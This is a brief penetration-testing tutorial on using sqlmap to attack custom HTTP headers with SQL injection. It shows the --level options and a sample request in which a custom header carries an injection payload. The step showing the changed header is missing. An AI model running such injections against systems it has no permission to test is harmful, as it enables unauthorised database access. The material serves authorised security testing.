When performing penetration testing, sqlmap can be used to have a granular control of the various injection points during a SQL injection.
For example, the HTTP Cookie header, the HTTP Referer header as well as the HTTP User-Agent header can be attacked by specifying the proper options:
--level=2 // Attack the Cookie header --level=3 // Attack the User-Agent header, as well as the Referer header --level=5 // Attack the Host header
But what if we want to inject a custom HTTP header not included in this predefined list? Let us take a look at an actual request to better grasp what it is we’re after.
GET /feedback.html HTTP/1.1 Host: www.superconfigure.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: whatever Referer: https://www.superconfigure.com/feedback.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-GB,en-US;q=0.8,en;q=0.6,fr;q=0.4 Bacon: injectMe Cookie: blog=okiok
In this very ordinary query, the HTTP header we are chasing after is highlighted. To have that value tested through sqlmap, we must use simply change the header as follows, indicating to sqlmap that we have a custom injection point:
Simple, no ‐‐level or ‐‐risk required, sqlmap will carry out its attack on that HTTP header:
GET /feedback.html HTTP/1.1 Accept-Language: en-GB,en-US;q=0.8,en;q=0.6,fr;q=0.4 Accept-Encoding: gzip,deflate Bacon: ) AND 9816=9267 AND (3941=3941 Host: www.superconfigure.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: whatever Connection: close Referer: https://www.superconfigure.com/feedback.html Cookie: blog=okiok